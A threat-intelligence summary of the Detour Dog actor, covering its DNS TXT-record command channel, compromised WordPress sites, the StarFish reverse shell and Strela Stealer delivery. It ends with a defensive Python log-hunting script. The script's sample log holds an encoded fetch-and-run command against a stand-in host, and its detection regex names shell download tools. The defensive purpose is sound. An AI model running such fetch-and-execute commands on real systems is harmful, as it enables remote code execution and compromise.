Full Report
A threat actor named Detour Dog has been outed as powering campaigns distributing an information stealer known as Strela Stealer. That's according to findings from Infoblox, which found the threat actor to maintain control of domains hosting the first stage of the stealer, a backdoor called StarFish. The DNS threat intelligence firm said it has been tracking Detour Dog since August 2023, when
Analysis Summary
# Threat Actor: Detour Dog
## Attribution & Identity
- **Identified as:** Detour Dog.
- **Associated Groups/Activities:** Linked to infrastructure hosting the first stage of the **Strela Stealer** payload. Known to have been tracked since August 2023, with traces dating back to February 2020. Associated with the malware **StarFish** (a reverse shell).
## Activity Summary
Detour Dog powers campaigns distributing Strela Stealer: its infrastructure hosts the first-stage backdoor, StarFish. The actor has been active on compromised websites since at least February 2020; in August 2023 Sucuri disclosed its use of DNS TXT records as a traffic distribution system (TDS) to redirect visitors to scams and malware. That DNS-based control channel has since been extended to push remote content execution commands to compromised sites, which is how it now supports the Strela Stealer deployment. Detour Dog contracts botnets such as REM Proxy and Tofsee to send the spam e-mails whose links lead to Detour Dog-controlled hosts serving the malware.
## Tactics, Techniques & Procedures
- Exploiting vulnerable WordPress sites to inject malicious code.
- Using malicious SVG files to deliver the StarFish backdoor.
- Utilizing **DNS TXT records** as the primary command-and-control (C2) channel: the code injected into a compromised site queries actor-controlled name servers, and the TXT answer tells it whether to serve normal content, redirect the visitor, or fetch and execute remote content.
- Keeping a low profile: roughly 90% of the time the compromised site is instructed to serve its normal content, so most visitors and site owners see nothing wrong.
- Redirecting a small share of visitors (around 9%) to scams via the Help TDS or Monetizer TDS.
- Issuing remote file execution commands only rarely (around 1% of responses); this is the capability that supports the Strela Stealer deployment.
- Leveraging botnets (REM Proxy, Tofsee) for initial spam distribution.
- **MITRE ATT&CK IDs:** Not stated in the report; the mappings below are inferred from the described behaviour:
- T1071.004 (Application Layer Protocol: DNS) for the TXT-record C2 channel.
- T1566.001 (Phishing: Spearphishing Attachment) or T1566.002 (Phishing: Spearphishing Link) for the spam sent through contracted botnets.
- Persistence on infected endpoints (e.g. T1547.001, Registry Run Keys / Startup Folder) is not described for StarFish or Strela Stealer in this report and remains an assumption.
## Targeting
- **Sectors:** Website operators, specifically self-hosted WordPress sites, which are compromised to serve as staging infrastructure. The ultimate targets are the systems infected with Strela Stealer, implying a financial motive.
- **Geography:** Not explicitly defined, but victims of the related Strela Stealer campaigns (Hive0145) have included German inboxes.
- **Victims:** Compromised WordPress sites acting as staging hosts; the end victims infected with Strela Stealer are likely organizations targeted by **Hive0145** (assessed as an Initial Access Broker (IAB)).
## Tools & Infrastructure
- **Malware families used:**
- **StarFish:** A simple reverse shell acting as the first stage backdoor.
- **Strela Stealer:** The primary information stealer payload delivered by the chain.
- **PrivateLoader:** Mentioned as a historical loader associated with Tofsee botnet propagation.
- **Infrastructure (C2, domains, IPs):**
- Domains controlled by Detour Dog hosting StarFish.
- Actor-controlled name servers that parse specially formatted DNS queries from compromised sites and return instructions in TXT records (the C2 channel).
- Affiliation with the **REM Proxy** botnet (powered by SystemBC).
## Implications
Detour Dog represents a sophisticated service provider in the initial access and malware delivery economy. Its reliance on TXT-record C2 over DNS, and its ability to keep a low profile on compromised infrastructure (appearing benign about 90% of the time), make detection difficult. It appears to operate as a contractor, bridging established botnets (REM Proxy, Tofsee) with high-value criminal payloads like Strela Stealer, which points to financial gain through initial access brokering.
## Mitigations
- Harden WordPress deployments: keep core, themes and plugins patched, remove unused plugins, restrict who can modify theme and plugin files, and monitor for injected PHP. Separately, treat SVG attachments in e-mail as active content (they can carry script) and block or sandbox them at the mail gateway, since that is the file type used to deliver StarFish.
- Deploy DNS monitoring capable of flagging TXT queries originating from web servers, high-entropy or unusually long subdomain labels, and TXT responses that decode to URLs or commands, in addition to non-standard query formats.
- Restrict outbound connections from web servers (egress allowlisting) so that a reverse shell such as StarFish cannot call home even if the site is compromised.
- Investigate indicators related to known botnets like REM Proxy/SystemBC, as their involvement points towards Detour Dog infrastructure.
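To make the DNS-monitoring mitigation above (and the TXT-record C2 behaviour described under Tactics, Techniques & Procedures) concrete, here is an added hunting script that is not part of the original report or Infoblox's tooling. It walks resolver log lines, keeps only TXT lookups issued by web servers, and flags beacons by three signals: a high-entropy encoded label in the query name, a TXT answer that decodes to a URL (redirect), and an answer that decodes to a shell command (remote execution). The log layout, the base64 label encoding, the zone `ns1.c2.example.net`, the host addresses and every log record are constructed for this example and are not Detour Dog's actual wire format.

```python
"""Hunt DNS resolver logs for TXT-record C2 beacons from web servers.

Added example; the log layout, the base64 subdomain encoding and the sample
records are constructed, not Detour Dog's real format or Infoblox's logic.
"""
import base64
import math
import re
from collections import Counter, defaultdict

# Assumed environment: web hosts that should rarely issue TXT lookups, and the
# few TXT names they legitimately resolve (mail policy, ACME challenges).
WEB_SERVERS = {"10.0.5.21", "10.0.5.22"}
ALLOWED_TXT_NAMES = {"_dmarc.example.com", "_acme-challenge.example.com"}

# Assumed log layout: timestamp client qname qtype rcode answer
LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\S+) "?(.*?)"?$')
ENCODED_LABEL_RE = re.compile(r"^[A-Za-z0-9_-]{12,}$")
B64_RE = re.compile(r"[A-Za-z0-9+/=_-]{8,}")
URL_RE = re.compile(r"https?://\S+")
EXEC_RE = re.compile(r"\b(curl|wget|sh|bash|php|eval|base64)\b")


def _b64url(text):
    """Unpadded URL-safe base64 that is valid inside a DNS label."""
    return base64.urlsafe_b64encode(text.encode()).decode().rstrip("=")


# Constructed log: 10.0.5.21 is a WordPress host beaconing to the assumed
# attacker zone ns1.c2.example.net with the visited page encoded in a label.
C2_ZONE = "ns1.c2.example.net"
SAMPLE_LOG = "\n".join([
    '2025-10-02T10:00:01Z 10.0.5.21 _dmarc.example.com TXT NOERROR "v=DMARC1; p=reject"',
    f'2025-10-02T10:00:05Z 10.0.5.21 {_b64url("page=index.php")}.{C2_ZONE} TXT NOERROR "ok"',
    f'2025-10-02T10:00:09Z 10.0.5.21 {_b64url("page=post.php&ua=Mozilla")}.{C2_ZONE} '
    f'TXT NOERROR "{_b64url("https://landing.example.net/go")}"',
    f'2025-10-02T10:00:12Z 10.0.5.21 {_b64url("page=wp-login.php")}.{C2_ZONE} '
    f'TXT NOERROR "{_b64url("curl -s http://drop.example.net/s.php | sh")}"',
    "2025-10-02T10:00:15Z 10.0.9.4 www.example.com A NOERROR 93.184.216.34",
    '2025-10-02T10:00:20Z 10.0.9.4 example.com TXT NOERROR "v=spf1 -all"',
])


def shannon_entropy(s):
    """Bits per character; encoded labels sit well above ordinary hostnames."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def looks_encoded(label):
    """Long, charset-restricted, high-entropy label: likely encoded data."""
    return bool(ENCODED_LABEL_RE.match(label)) and shannon_entropy(label) > 3.5


def decode_txt(answer):
    """Base64-decode a TXT answer when it plausibly is one, else None."""
    s = answer.strip()
    if not B64_RE.fullmatch(s):
        return None
    s = s.replace("-", "+").replace("_", "/") + "=" * (-len(s) % 4)
    try:
        return base64.b64decode(s, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def classify(decoded):
    """Map a decoded TXT payload onto the behaviours described above."""
    if decoded is None:
        return "benign-or-opaque"
    if EXEC_RE.search(decoded):
        return "remote-execution"
    return "redirect" if URL_RE.search(decoded) else "encoded-unknown"


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    ts, client, qname, qtype, rcode, answer = m.groups()
    return {"ts": ts, "client": client, "qname": qname.rstrip("."),
            "qtype": qtype, "rcode": rcode, "answer": answer}


def analyze(log_text):
    """Return (alerts, beacon_counts) for suspicious TXT lookups by web servers."""
    alerts, beacons = [], defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or rec["qtype"] != "TXT" or rec["client"] not in WEB_SERVERS:
            continue
        if rec["qname"].lower() in ALLOWED_TXT_NAMES:
            continue
        labels = rec["qname"].split(".")
        encoded = [l for l in labels if looks_encoded(l)]
        verdict = classify(decode_txt(rec["answer"]))
        # The beacon itself is the signal: a "serve normally" answer (the common
        # case) still reveals the compromised host talking to the C2 zone.
        if encoded or verdict != "benign-or-opaque":
            apex = ".".join(labels[-2:])  # naive apex; use a PSL in production
            beacons[(rec["client"], apex)] += 1
            alerts.append({"ts": rec["ts"], "client": rec["client"],
                           "qname": rec["qname"], "verdict": verdict})
    return alerts, dict(beacons)
```

Run `analyze(SAMPLE_LOG)` and the three beacons from 10.0.5.21 come back in order as benign-or-opaque, redirect and remote-execution, with a beacon count of 3 for that host against the C2 zone, while the DMARC and SPF lookups are ignored. The point worth taking from the first alert is that the "serve normally" answer, which is the 90% case, does not hide the compromise: the web server's TXT query to a zone it has no business resolving is itself the indicator, so the hunt should key on the query, not only on answers that decode to something obviously bad.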